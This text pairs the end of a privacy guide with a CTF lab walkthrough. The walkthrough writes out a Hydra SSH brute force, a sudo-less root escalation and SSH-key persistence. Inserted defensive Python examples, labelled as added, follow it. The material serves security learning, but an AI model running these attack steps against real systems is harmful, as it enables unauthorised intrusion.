  • Gmail –> Tuta Mail or Mailbox Mail, and/or Thunderbird. Tuta and Mailbox Mail are both encrypted email providers that will be a significant step up from Gmail. That being said, bear in mind that the main gain is privacy with respect to the provider – end-to-end encryption, by definition, is only ever enabled for these services if the person you are emailing uses a compatible encryption service. I've personally heard better things about Tuta's user experience, and it's what I personally use. If you continue to use Gmail, I'd recommend using Thunderbird as an email client, as it will provide some modest improvements over accessing your Gmail on the web (and does enable E2EE if you're looking to do so).

  • Google Maps –> Open Street Map/Organic Maps or Apple Maps. Open Street Map is community-developed, which is great, but means that it isn't always as up-to-date. Organic Maps is the one iOS app for OSM that I know of (though there may be others), and it doesn't have the best routing features, nor is it always up-to-date with OSM, even. For most people with iPhones, I'd recommend just using Apple Maps, as it is marginally more private than Google Maps, and much more comparable in features/map data.

  • Google Drive –> CryptPad or LibreOffice. Privacy Guides only recommends CryptPad, so it's my primary choice as well. Filen is a good second choice, especially if you need more than 1 free GB (Filen offers 10). LibreOffice is a decent primarily offline replacement, though as a consequence it's more a Microsoft Office replacement than a Google one.

  • Google Photos –> Ente. If you're wanting a specifically online photo/video manager, Ente is your best bet. Naturally, you could also simply store things offline or use one of the Drive replacements.

  • YouTube –> FreeTube. You have a lot of options for YouTube replacements, including alternative front-ends like Invidious and Fediverse equivalents like PeerTube. If you want to keep your subscriptions, however, a client is the way to go (Invidious had some support for accounts/subs, but I believe that's largely died). FreeTube is not the only client option, but it is easily my favorite. You can import your subscriptions quite easily, but for playlists you may have to import from URLs. Since Watch Later cannot be made public, to import it from URL you will have to copy it to another playlist, then import that playlist. The extension Multiselect for YouTube makes this fairly quick. FreeTube will occasionally break for a short time after YouTube changes things, but generally it works quite well, and has some fantastic features.

  • Google News –> NetWireNews (iOS) or Feeder (Android). I'd highly recommend using RSS for your news aggregation. It gives you much better control, and you can avoid ads and all other nonsense. You can typically add news sources simply by pasting in their URL, though occasionally you may need to add /rss or /feed to the end.

  • Google Keep –> Obsidian. It has so many great features; I truly can't recommend it enough.

  • Google Meet –> Jitsi Meet. Naturally, you may not always have a choice, but Jitsi is the preferred option for secure video calls.

Hardware

Avoid smart home devices at any cost, end of story. For a phone, ideally, I'd recommend a Pixel with GrapheneOS, the gold-standard for secure mobile OSs (Graphene has plans to be available on other phones, but this is still in the works). Privacy Guides also has some app recommendations and advice on how best to obtain apps (of particular note – avoid the Google Play store, and F-Droid isn’t the best either).

iOS Recommendations

Privacy and Security Settings

Shut off everything under Analytics and Improvements and Apple Advertising. Under Tracking, disable Allow Apps to Request to Track and disable permissions for all the apps that requested it.

Under Location Services, review which apps have access and disable or limit any unnecessary ones. This should include location logging for the Camera app! Next, at the bottom of Location Services you’ll want to go into System Services. You can disable the vast majority of these services. Emergency Calls and SOS, Find My iPhone, and Share My Location should probably be left enabled for most people. Disabling Networking and Wireless can potentially impact performance, since you may not always be connected to the closest tower. Personally, I haven’t noticed a difference. Everything under Product Improvement (iPhone Analytics, etc) should be disabled as well.

Still under System Services, I would also highly recommend disabling Significant Locations. This feature logs locations you visit in order to determine the titular “significant” locations, allowing it to effectively have map pins for your home, work, favorite grocery store, friends’ apartments, etc. This will clear certain Apple Maps saved locations, but I would recommend it regardless.

Lastly, I'd recommend going through Safety Check to see and confirm/retract information you are still sharing. Enabling the App Privacy Report can also be useful, as it logs what domains apps are contacting. (Note that it'll be on you to go back later and see what apps are regularly contacting Facebook; it's just a passive report).

iCloud

Obviously, anything in your iCloud can potentially be accessed by Apple. Thankfully, Apple does offer end-to-end encryption for iCloud, though it is disabled by default. Be aware that enabling it means that if you ever fully get locked out of your phone / iCloud, Apple will not be able to retrieve your stuff.

Under iCloud, disable anything you don’t need backed up (and consider that that could mean everything). You may also want to consider disabling Access iCloud Data on the Web at the bottom. Most crucially, enable Advanced Data Protection.

Network

Go to Wi-Fi, then select the i by your Wi-Fi network. Scroll down to Private Wi-Fi Address. Set this to Rotating if it isn’t already, and below it enable Limit IP Address Tracking. While your iPhone generally will, by default, generate a different address for each network, it may not be set to randomize on the same network. Rotating is generally better, but for networks that force you through a portal (like hotels), it may make you sign back in each time. (This is why, you’ll note, these settings are individual to each network).

I'd recommend setting up a private DNS, with Mullvad's “base” DNS being my top recommendation. This will help keep your browsing a little more private, with the added benefit of blocking ads, trackers, and malware. You can follow Mullvad's instructions on setting it up. It is fairly straightforward, but do be sure to do the seemingly pointless step of selecting the profile in Files (step 7), otherwise the Profile Download button will not appear in step 9.

A VPN isn't a bad idea either, though in my experience mobile VPNs can be a bit buggy at times. Proton VPN is the only good free option I know of (even though I don't wholly trust Proton), while Mullvad VPN would be my recommendation for anyone who can pay for a VPN. IVPN is pretty good as well, and fairly comparable to Mullvad. I would strongly recommend against any VPN that isn't those 3.

Browser

While there are an array of options for iOS browsers, the choices are in actuality limited by the restrictions that Apple places on browsers that are not Safari. Brave, DuckDuckGo, and Firefox Focus do all have some improvements over base Safari. So barring any tweaking, I'd recommend DDG as a daily driver and Firefox Focus if you want permanent incognito (I do not recommend Brave, both for the crypto BS and because the CEO is homophobic).

Overall, however, if you truly want a private browser, Safari is the best choice. I would recommend following Privacy Guide's tips for settings to harden it, excluding their recommendation to enable FaceID for private browsing (I don't recommend biometrics in general, since they potentially allow access without your consent).

I would also highly recommend installing uBlock Origin Lite as a Safari extension, which will help further reduce ads/trackers/etc. uBlock Origin is the gold-standard content blocker; I wouldn't recommend a different one.

Other Apps/Reccs

Use Signal whenever possible. Other messaging apps like WhatsApp or Telegram are marginally more secure than iMessage, but are significantly less secure than Signal.

Do not include locations on images, and ideally, go a step further and scrub the metadata entirely. You can create a button via Shortcuts to do this pretty easily. Note that you’ll need separate shortcuts for photos, videos, and GIFs. Making a GIF shortcut is very similar to the photos shortcut, but instead of using Convert, you use Make GIF. You could also just install an app to scrub metadata, but I'd recommend against it, as you don't know what is truly being done with your photos.

As mentioned, you can use Organic Maps for totally private maps, though it isn't amazing. Again, Apple Maps is at least marginally better than Google Maps.

PC Privacy

Naturally, many of my De-Googling recommendations will be relevant here, so refer back to that if needed (for Office/Drive replacements, search engines, email, etc).

Operating Systems

I'm still a relative noob to Linux, but I have some potential distro recommendations. Linux Mint is the common recc for users new to Linux, as it is made to resemble Windows and is pretty well maintained. Privacy Guides recommends Fedora, openSUSE Tumbleweed, Arch Linux, and NixOS for privacy-conscious distributions. Of those, Fedora is the most beginner-friendly (which may not be saying too much if you have 0 command-line or Linux experience).

You'll also often have a choice of desktop environment, such as GNOME, KDE, Cinnamon, LXQt, and Xfce. Across both distros and desktop environments, you may see that some are considered “lightweight”, meaning that they are less resource intensive, and so may be good for older hardware.

I have only really used Lubuntu, a lightweight fork of Ubuntu using the LXQt desktop environment (I wouldn't recommend Ubuntu itself, as it's become pretty corporate). I put it on several old laptops and it's been pretty nice, though I think I'd probably use Fedora KDE if I wanted a true daily driver (greater privacy and support as far as I know, probably lower likelihood to run into some of the issues I've hit).

You can get most OSs “live”, meaning you can put them on a USB and boot from them without overwriting your true OS. Very handy for testing, and actually pretty easy! There are also some OSs that are purely live, such as Tails, which is an OS designed specifically for maximum privacy, routing connections through Tor and wiping data when done. You can also use Virtual Machines to run different OSs, including Whonix, which is similar to Tails, but with greater security features (and cannot, to my knowledge, run outside of a VM).

Windows Settings

Again, I’d highly recommend anyone who feels comfortable to jump to Linux to do so (and consider testing out a live OS, switching over may be easier than you think!). Otherwise, software like Revision can “clean” existing Windows 10/11. Please tread carefully if you’re interested; I can't attest much to functionality or trustworthiness. There are other options available for cleaner installs, but if you're willing to reinstall your OS, I would again highly encourage switching to Linux (compatibility has improved dramatically in recent years!).

Barring messing with your operating system directly, though, there are certainly still important steps you can take. To start, use ShutUp10++ to disable invasive Windows features – it will provide a GUI with recommendations and explanations for what should be disabled. Some of the following settings changes will be redundant with ShutUp10++.

Privacy and Security – In settings, go under Privacy & Security. Under General, turn off the Advertising ID in particular, along with the other settings in that section (except notifications). Disable everything under Diagnostics & Feedback and Text & Image Generation. Under Location, turn off Let Apps Access Your Location (they can still see approximate location; this just gets rid of precise location).

General Settings – Under Personalization > Device Use, disable everything. Also disable and remove anything under System > AI Components.

Wi-Fi – Go under Network & Internet > Wi-Fi. Below Hardware properties, enable Random hardware address. This can potentially force additional sign-ins on networks with portals, such as hotels, but is a good privacy step.

Services – Disable SSDP Discovery and UPnP Device Host. Both enable discovery and communication with different types of devices on your network, so this could potentially disconnect a device. This does not apply to standard Bluetooth devices, so for most people this is a security risk more than anything.

Browser

Your only options for a browser are Chromium-based and Gecko-based (i.e., Chrome/Firefox-based). Chromium has several limitations that immediately shoot any option there in the foot, so in all practicality you should only be looking at Firefox and Firefox forks.

Firefox itself isn't the worst, but has been making a move towards AI lately, and takes some effort to make more private. Refer to Privacy Guide's page on Firefox for more info if interested.

There are a number of forks that are probably ok options for daily drivers, such as Waterfox and Zen Browser. They benefit in not having the AI enshittification, but being downstream, are slower to update than Firefox (and therefore potentially vulnerable). So, if you're going with a fork, I'd recommend just going for one of the more privacy-focused options.

When it comes to truly private browsers, the forerunners are Librewolf, Mullvad, and Tor. Tor is the choice for the truly privacy conscious, as connections are routed over several relays, making it extremely difficult to match your browsing activity to you. Unfortunately, a number of websites block Tor users, and it can be a bit slower at times, so while I do recommend it for general browsing/searching, it probably won't be the best fit for daily use for most people.

Mullvad is essentially just the Tor browser minus the relays, making it much more usable on the daily and more private out of the box than Librewolf. I should note, however, that Librewolf updates faster than Tor/Mullvad, meaning that it has an easier time blending in with general Firefox traffic. Therefore, I'd either recommend Mullvad, or Librewolf with uBlock Origin, Port Authority, and Canvas Blocker, plus some settings tweaks. If you really want privacy but aren't very tech savvy, just go with Mullvad, but hardened Librewolf might be my preference. (And if you aren't a privacy nut, base Librewolf really isn't bad).

VPN/DNS

As mentioned for iOS, I would recommend using Mullvad's “base” DNS for slightly improved privacy + some ad and tracker blocking. You can refer to their website for how to set it up via Wi-Fi hardware settings or via browser settings. Both are fairly straightforward, though browser is certainly a bit quicker to set up. Nonetheless, I would recommend setting it up on your Wi-Fi, so your whole system gets the benefits.

As for VPNs, again, Mullvad, IVPN, and Proton VPN are the only real forerunners. I personally would not trust Proton all that much. Mullvad and IVPN are fairly similar as far as protocols go. IVPN has better split-tunneling, though, while Mullvad offers more devices on their basic plan (5 vs 3) and has better IPv6 and anti-censorship features. If you know you'll need a few apps to always be split-tunneled, I'd recommend IVPN, otherwise I'd recommend Mullvad. (And if you think you desperately need to use a VPN for something, probably just use Tor. VPNs are far from infallible).

Additional Software

BleachBit – The primary use of BleachBit is to clear space, with some secondary privacy gains. Namely, BleachBit clears data fragments, temporary files, and even (optionally) browser caches, saved passwords, etc. This can potentially clear several gigabytes of space, and the cleaning of data fragments ensures that deleted files are well and truly deleted.

ExifTool – A command-line utility to strip metadata from photos and videos. Would highly recommend using it before posting stuff publicly.
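The Shortcuts approach in the iOS section and ExifTool both remove data you cannot see in the photo itself. To show what that removal actually does at the byte level, here is an added example (not from the guide, and not ExifTool's code) that strips the Exif, IPTC and comment segments from a JPEG using only the Python standard library. The sample JPEG it operates on is constructed inline with placeholder payloads, so the marker layout is real but the image data is not.

```python
"""Strip identifying metadata from a JPEG without any third-party tool.

Added example, not the guide's own tooling. It walks the marker segments that
precede the Start-Of-Scan (SOS) marker and drops the ones that commonly carry
personal data, copying everything else through unchanged so the picture still
decodes. Dropped by default:
  APP1  (0xFFE1)  Exif (camera, timestamps, GPS) and XMP
  APP13 (0xFFED)  Photoshop / IPTC author, caption, keywords
  COM   (0xFFFE)  free-text comments
"""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8), SOI, EOI}   # markers that carry no length field
PRIVACY_MARKERS = {0xE1, 0xED, 0xFE}


def iter_segments(data):
    """Yield (offset, marker, raw_segment) for each segment up to and including SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:   # optional 0xFF fill bytes
            pos += 1
        marker = data[pos + 1]
        if marker in STANDALONE:
            yield pos, marker, data[pos:pos + 2]
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        end = pos + 2 + length               # length counts itself but not the marker
        if end > len(data):
            raise ValueError(f"truncated segment at offset {pos}")
        yield pos, marker, data[pos:end]
        if marker == SOS:                    # entropy-coded scan follows; stop parsing
            return
        pos = end
    raise ValueError("no SOS marker found")


def strip_jpeg_metadata(data, drop=PRIVACY_MARKERS):
    """Return a copy of `data` with the segments whose marker is in `drop` removed."""
    out = bytearray(b"\xff\xd8")
    for offset, marker, segment in iter_segments(data):
        if marker in drop:
            continue
        out += segment
        if marker == SOS:
            out += data[offset + len(segment):]   # scan data and EOI, copied verbatim
    return bytes(out)


def segment_markers(data):
    """Marker codes in order, handy for verifying what a file still contains."""
    return [marker for _, marker, _ in iter_segments(data)]


def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: structurally valid segments with placeholder payloads.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00MM\x00\x2a" + b"<constructed GPS and camera tags>")
    + _segment(0xFE, b"taken at home, constructed comment")
    + _segment(0xED, b"Photoshop 3.0\x008BIM<constructed IPTC author>")
    + _segment(0xDB, bytes(65))                     # quantisation table placeholder
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")   # SOS header
    + b"\x12\x34\x56\x78"                           # placeholder entropy-coded data
    + b"\xff\xd9"
)

if __name__ == "__main__":
    cleaned = strip_jpeg_metadata(SAMPLE_JPEG)
    print("before:", [hex(m) for m in segment_markers(SAMPLE_JPEG)])
    print("after: ", [hex(m) for m in segment_markers(cleaned)])
```

To clean a real file, read it with open(path, 'rb').read(), pass the bytes to strip_jpeg_metadata and write the result to a new file; check the output with segment_markers (or ExifTool) to confirm no APP1 segment remains. PNG, HEIC and video containers store metadata differently, which is why the Shortcut in the iOS section needs separate variants per media type.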

KeePassXC – My preferred password manager. Bitwarden may be a better pick if you want to sync passwords across devices, but KeePass is the goat for local password management.

Lutris – Not a privacy thing, but too handy for Linux not to mention. It lets you play all your games! It really integrates everything; you can manually add games in addition to linking all of the major game stores. With the built in compatibility/emulation tools, you can launch everything right from Lutris. Might require a little setup in some cases (particularly for manually added games), but honestly super functional.

 

from plutogazer writeups

This is a Walkthrough for the Brooklyn Nine Nine Capture The Flag TryHackMe room. The writeup is meant to offer short and concise solutions by using a bigger font and titling as “Task Number”, but also offering an extended explanation as subheaders for those interested in finding out more about the solution to a specific task.

Starting

Let's start with the basics – enumerate the open ports in the target. Let's use nmap.

```
nmap -sV MACHINE_IP
```

```
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

[Screenshot: index page]

We find three open ports with three services: SSH, FTP, and a web server. I tried enumerating the web server's directories to see if there was something of interest, but it only contains a background image.

Task 1: User flag

Because there was nothing but the index, any hint must be in the page itself.

  1. Check the web server's main page's source. Alternatively, open developer tools and inspect the index. You will find the following comment:

```
Have you ever heard of steganography?
```

Nice hint. So the background image might not be just a background image... In the page source we will find the following line: **background-image: url("brooklyn99.jpg");** The fact that url() specifies the image directly means that it can be found in the same path we're at right now.

  2. Download the background image. I used wget for this.

```
wget http://MACHINE_IP/brooklyn99.jpg
```

  3. Use steganography tools to uncover the secret behind the image. I decided to use **stegseek**.

*Note: I was using TryHackMe's AttackBox. Stegseek, however, is not included in the AttackBox – I had to install it, as the steganography tool that was available has been deprecated.*

```
stegseek brooklyn99.jpg
```

We get the following message:

```
[i] Found passphrase: "[REDACTED]"
```

  4. Decode the image with the passphrase we found. I used https://futureboy.us/stegano/decinput.html to do this.

This shows us the following message:

Holts Password:

[REDACTED]

Enjoy!!

Time to get access.

  1. Gain access to the target. *According to the creator, there are two ways to gain access. I assume this is either directly through SSH with holt's password or the long way around, with the password of the user we will find right now. I chose the long way around:* We will do this with the FTP port we found.

```
ftp MACHINE_IP
```

It will tell us that the server only accepts anonymous connections. Let's attempt a new connection, with “anonymous” as the user.

```
ftp> open MACHINE_IP
```

```
Connected to MACHINE_IP.
220 (vsFTPd 3.0.3)
Name (MACHINE_IP:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
```

  2. Examine the server's contents with the dir FTP command.

```
ftp> dir
```

```
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
```

  3. Download the file with the get FTP command.

```
ftp> get note_to_jake.txt
```

The file says the following:

```
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
```

Now we know a way to actually access the system. Assuming Amy and Jake are both existing users, and Amy is telling us Jake has a weak password, let us see if we can brute-force Jake's password.

  4. Attempt to gain access through SSH by brute-forcing Jake's password. I will use Hydra for this.

```
hydra -l jake -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh
```

It took Hydra about one second to find it. So, knowing the password:

  5. Log in to the system with Jake's password.

```
ssh jake@MACHINE_IP
```

  6. Find the User flag. You can look for it manually, or use the following command:

```
find /home/ -name user.txt 2>/dev/null
```

Task 2: Root flag

To access the Root flag (likely at /root/) we will need root access.

  1. Find a way to escalate privileges. Check what the current user can run as root.

```
sudo -l -l
```

We get the following information:

```
Matching Defaults entries for jake on brooklyninenine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User jake may run the following commands on brooklyninenine:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
        /usr/bin/less
```

So, it seems jake can run less as root.

  2. Find a way to exploit this vulnerability. I searched GTFOBins and found the following command:

```
sudo less /etc/profile
!/bin/sh
```

This, indeed, allowed us to escalate privileges and act as the root user.

  3. Find the root flag.

```
find / -name root.txt 2>/dev/null
```

Eventually, we will find where root.txt is located. It contains the following message:

```
- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: [REDACTED]
Enjoy!!
```

Congratulations! The room is finished.
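The sudoers rule behind this escalation is something a defender can find before anyone looks it up on GTFOBins. The following is an added example, not part of the writeup or the room: it parses sudoers-style rules (a constructed excerpt modelled on the sudo -l -l output above) and flags commands that hand an unprivileged user an interactive root session, which is the check you would run as part of a hardening audit.

```python
"""Audit sudoers rules for the escalation path the room exploited.

Added example, not the room's own material; the sudoers text is constructed.
A rule that lets a user run an interactive program (pager, editor, interpreter)
as root is an escalation path, because those programs can launch other
programs from inside; NOPASSWD (the '!authenticate' option in `sudo -l -l`
output) just removes the last hurdle. The fix is to remove the rule or, at
minimum, add the NOEXEC tag.
"""
import re

# Programs that can run other programs from within (a small subset of what
# GTFOBins documents); extend to taste.
SHELL_ESCAPE_CAPABLE = {"less", "more", "man", "vi", "vim", "nano", "find", "awk", "perl", "python3"}

RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.*)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")


def parse_sudoers(text):
    """Parse 'user HOST=(runas) [TAG:] cmd, [TAG:] cmd' lines into rule dicts.
    Defaults, comments and alias lines are skipped; include files are not followed."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # A tag applies to every following command until its opposite appears.
        state = {"nopasswd": False, "noexec": False}
        commands = []
        for part in m["spec"].split(","):
            part = part.strip()
            while (t := TAG_RE.match(part)):
                tag, part = t.group(1), part[t.end():].lstrip()
                if tag in ("NOPASSWD", "PASSWD"):
                    state["nopasswd"] = tag == "NOPASSWD"
                elif tag in ("NOEXEC", "EXEC"):
                    state["noexec"] = tag == "NOEXEC"
            if part:
                commands.append({"command": part, **state})
        rules.append({"user": m["user"], "host": m["host"],
                      "runas": m["runas"] or "root", "commands": commands})
    return rules


def find_escalation_paths(rules):
    """Report commands that give a non-root user an interactive root session."""
    findings = []
    for rule in rules:
        if rule["user"] == "root":
            continue
        for cmd in rule["commands"]:
            program = cmd["command"].split()[0].rsplit("/", 1)[-1]
            if cmd["command"] == "ALL":
                reason = "ALL commands allowed"
            elif program in SHELL_ESCAPE_CAPABLE and not cmd["noexec"]:
                reason = f"{program} can spawn other programs and NOEXEC is not set"
            else:
                continue
            findings.append({"user": rule["user"], "runas": rule["runas"],
                             "command": cmd["command"], "nopasswd": cmd["nopasswd"],
                             "reason": reason})
    return findings


# Constructed sudoers excerpt; the jake line mirrors the room's 'sudo -l -l' output.
SAMPLE_SUDOERS = """\
# constructed excerpt, not the target's real /etc/sudoers
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
jake    ALL=(ALL) NOPASSWD: /usr/bin/less
amy     ALL=(root) NOEXEC: /usr/bin/vim /etc/hosts
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/, NOPASSWD: /usr/bin/systemctl restart rsyncd
"""

if __name__ == "__main__":
    for f in find_escalation_paths(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f['user']} -> ({f['runas']}) {f['command']}: {f['reason']}"
              + (" [NOPASSWD]" if f["nopasswd"] else ""))
```

NOEXEC stops a pager or editor from executing other programs, but an editor run as root can still write any file, so removing the rule or pinning the argument is the stronger fix; the script reports NOPASSWD separately because it decides whether the user's own password is a hurdle at all.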

Optional: Persistence and Better Shell

What would happen if Holt and Jake changed their passwords? This method would no longer work. How do we bypass this? Persistence. Also, the terminal we get by escalating privileges with GTFOBins is quite rudimentary (no tabbing functionality!). How do we fix this? With a *“better shell”.*

Persistence

The most direct way to achieve persistence (for this room) would be by using SSH keys. We will leave our public SSH key in the ~/.ssh/authorized_keys file of the target machine.

  1. Have access to the target machine.

  2. Generate SSH keys on your machine. This is done with the ssh-keygen command. By default, the algorithm used is RSA. Using this command will create a public and a private key, named id_rsa.pub and id_rsa, respectively.

  3. Change permissions on the id_rsa file to 600 (or stricter). This is done with the chmod command. This is because only the owner of the key should be able to read or overwrite it; otherwise SSH ignores it and forces you to connect with a password instead.

  4. Copy the contents of **id_rsa.pub** to the ~/.ssh/authorized_keys file on the target machine. This file essentially tells the target's server to “trust everyone that connects with these keys.”

  5. Connect to the target's SSH server with your private SSH key. This is done with the following command:

```
ssh -i /path/to/id_rsa user@target
```

You will be able to log in as any user with this method, and you won't be asked for a password at any time. Furthermore, because we are connecting through SSH, we have now a “better shell.”

The target can still find out about this, and remove our key from authorized_keys. We can add a reverse shell as a cronjob on their machine, and just set up a listener on our machine when necessary, but this is already exceeding the scope of this room, so we'll leave it here.
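The defensive counterpart to the persistence step above is knowing exactly which keys belong in authorized_keys, because the injected key only works for as long as it sits there unnoticed. Added example, not from the writeup: it parses an authorized_keys file, computes the SHA256 fingerprint that ssh-keygen -lf shows, and reports any entry whose fingerprint is not in a baseline. The two keys in the sample are constructed in OpenSSH wire format for the demo and are not real keys.

```python
"""Audit authorized_keys against a baseline of known key fingerprints.

Added example, not from the writeup. Fingerprints use the SHA256 form that
`ssh-keygen -lf` prints, so a baseline can be built from that command's
output on a known-good host. Both keys below are constructed, not real.
"""
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def ssh_fingerprint(b64_key):
    """SHA256:<base64 without padding> over the decoded key blob, as OpenSSH does."""
    digest = hashlib.sha256(base64.b64decode(b64_key)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Parse '[options] type base64 [comment]' lines; blanks and comments are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Options (command="...", from="...", no-pty, ...) come first; the key
        # type is the first field with a known prefix. Quoted option values that
        # contain whitespace are re-joined with single spaces.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue                      # malformed line, ignored
        entries.append({
            "line": lineno,
            "options": " ".join(fields[:idx]),
            "type": fields[idx],
            "fingerprint": ssh_fingerprint(fields[idx + 1]),
            "comment": " ".join(fields[idx + 2:]),
        })
    return entries


def find_unknown_keys(text, baseline):
    """Entries whose fingerprint is not in `baseline` (a set of 'SHA256:...' strings)."""
    return [e for e in parse_authorized_keys(text) if e["fingerprint"] not in baseline]


def _ed25519_key(seed):
    """Constructed ssh-ed25519 public key in OpenSSH wire format (not a real key)."""
    name = b"ssh-ed25519"
    blob = struct.pack(">I", len(name)) + name + struct.pack(">I", 32) + bytes(seed)
    return base64.b64encode(blob).decode()


KNOWN_KEY = _ed25519_key(range(32))
ROGUE_KEY = _ed25519_key(range(32, 64))
BASELINE = {ssh_fingerprint(KNOWN_KEY)}

# Constructed file: one expected key, one that nobody put on the baseline.
SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed authorized_keys file
ssh-ed25519 {KNOWN_KEY} jake@laptop
command="/usr/bin/rsync --server -a . /srv/",no-pty ssh-ed25519 {ROGUE_KEY} root@unknown-host
"""

if __name__ == "__main__":
    for e in find_unknown_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE):
        print(f"line {e['line']}: unknown {e['type']} key {e['fingerprint']} ({e['comment']})")
```

Run it from a cron job or a configuration-management check with the baseline built from a known-good snapshot; the options column is worth reading too, since a forced command or a from= restriction on an unexpected key says a lot about what it was added for.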

How it could have been avoided

There were several vulnerabilities we took advantage of in this machine. Let us list them and give one solution to each:

  • Disable sensitive ports when not used: the FTP and SSH ports should have been closed if they were not in use, as this is how we accessed the system. If they cannot be closed, add filters based on necessity, as this would have significantly decreased the chances of intrusion.

  • Store passwords safely: the attack worked because holt's password, despite being considered “very strong” by today's standards, was stored in plaintext. Even if “hidden” by steganography, it is not particularly difficult to find, and once we have the password, it can be used to get into the system. Passwords should be stored with a safe hashing algorithm, and salted.

  • Enforce strong password policies: CRUCIAL! jake's password was very weak. It took Hydra about one second to crack it. While “note to Jake” was a great hint, it was a matter of time before it was discovered. If jake had a strong password, we could not have used the method we used to break into the system. Strong passwords have a combination of numbers, lowercase and uppercase letters, and symbols, and are at least 16 characters long.

  • Review security configurations: do not allow anonymous access to FTP servers that contain sensitive files (even if what we found was “just” a note, we used this note as a hint to gain access). Do not allow unprivileged users to run files as root – this is how we escalated privileges. If these misconfigurations had not been in place, we would not have been able to gain access like we did.
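Of the points above, the weak-password one is also the easiest to catch while it is happening: a Hydra run like the one in Task 1 leaves a burst of “Failed password” lines in auth.log. The following added example (not from the writeup; the log lines are constructed to mirror that burst) counts failed password logins per source IP and account inside a time window and marks whether a later successful password login followed, which is the signal to act on. Tools like fail2ban implement the same idea with an automatic ban.

```python
"""Spot an SSH password brute force, and whether it succeeded, in auth.log.

Added example, not from the writeup; the log lines are constructed. An alert
fires when one source IP accumulates `threshold` failed password logins for
the same account inside `window`; a later 'Accepted password' from the same
pair upgrades the alert from noise to a probable compromise. On a real host:
    detect_bruteforce(open('/var/log/auth.log').read().splitlines())
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_line(line, year=2020):
    """Return a dict for sshd login lines, None for anything else.
    syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Alerts keyed by (ip, user): total failures and whether a login followed."""
    events = [e for e in map(parse_auth_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(list)     # (ip, user) -> failure timestamps inside the window
    total = Counter()
    alerts = {}
    for e in events:
        key = (e["ip"], e["user"])
        if e["result"] == "Failed" and e["method"] == "password":
            total[key] += 1
            recent[key] = [t for t in recent[key] if e["ts"] - t <= window] + [e["ts"]]
            if len(recent[key]) >= threshold and key not in alerts:
                alerts[key] = {"ip": e["ip"], "user": e["user"],
                               "first_seen": recent[key][0], "succeeded": False}
        elif e["result"] == "Accepted" and key in alerts:
            alerts[key]["succeeded"] = True
            alerts[key]["method"] = e["method"]
    for key, alert in alerts.items():
        alert["failures"] = total[key]
    return list(alerts.values())


def _line(second, text):
    return f"May 17 12:00:{second:02d} brooklyninenine sshd[{1200 + second}]: {text}"


# Constructed: twelve wrong guesses for jake from one address within 12 s,
# then a correct one, plus unrelated background noise.
SAMPLE_LOG = (
    [_line(0, "Accepted publickey for amy from 10.10.20.7 port 50122 ssh2")]
    + [_line(i, f"Failed password for jake from 10.10.14.2 port {40000 + i} ssh2") for i in range(1, 13)]
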